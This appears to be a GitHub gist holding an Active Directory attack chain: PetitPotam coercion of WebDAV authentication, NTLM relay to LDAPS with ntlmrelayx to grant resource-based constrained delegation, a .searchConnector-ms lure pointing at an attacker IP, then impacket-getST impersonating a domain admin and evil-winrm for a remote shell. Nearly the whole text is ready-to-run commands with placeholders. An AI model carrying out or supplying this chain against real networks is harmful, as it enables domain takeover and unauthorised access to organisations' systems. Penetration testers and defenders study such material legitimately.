Skip to content

Instantly share code, notes, and snippets.

@jakuta-tech
Forked from zimnyaa/webclient-rbcd.sh
Created November 30, 2023 12:34
Show Gist options
  • Save jakuta-tech/a6686912f8fb6f28841ff56b6eae8100 to your computer and use it in GitHub Desktop.
Save jakuta-tech/a6686912f8fb6f28841ff56b6eae8100 to your computer and use it in GitHub Desktop.
PetitPotam WebDAV coerced authentication + LDAPS relaying
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local
# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da
# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER
# if WebClient is not enabled, you will get the error 0x7. You can try to enable it by viewing a .searchConnector-ms file from the server (if it's a terminal server, for example) or hosting it on a public share and waiting
# Documents.searchConnector-ms example:
# <?xml version="1.0" encoding="UTF-8"?>
# <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
# <iconReference>imageres.dll,-1002</iconReference>
# <description>Microsoft Outlook</description>
# <isSearchOnlyItem>false</isSearchOnlyItem>
# <includeInStartMenuScope>true</includeInStartMenuScope>
# <iconReference>\\YOUR_IP@8080\whatever.ico</iconReference>
# <templateInfo>
# <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
# </templateInfo>
# <simpleLocation>
# <url>\\YOUR_IP@8080\whatever.ico</url>
# </simpleLocation>
# </searchConnectorDescription>
# ccache obtained with Rubeus /tgtdeleg and converted with ticketConverter
export KRB5CCNAME=ws.ccache
impacket-getST -k -spn wsman/TARGETSERVER.DOMAIN.local -dc-ip DC_IP -impersonate domain_admin DOMAIN.local/MYWS\$
# after setting up a KDC krb5.conf as per evil-winrm install instructions
export KRB5CCNAME=domain_admin.ccache
evil-winrm -r DOMAIN.local -i TARGETSERVER.DOMAIN.local --spn wsman
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment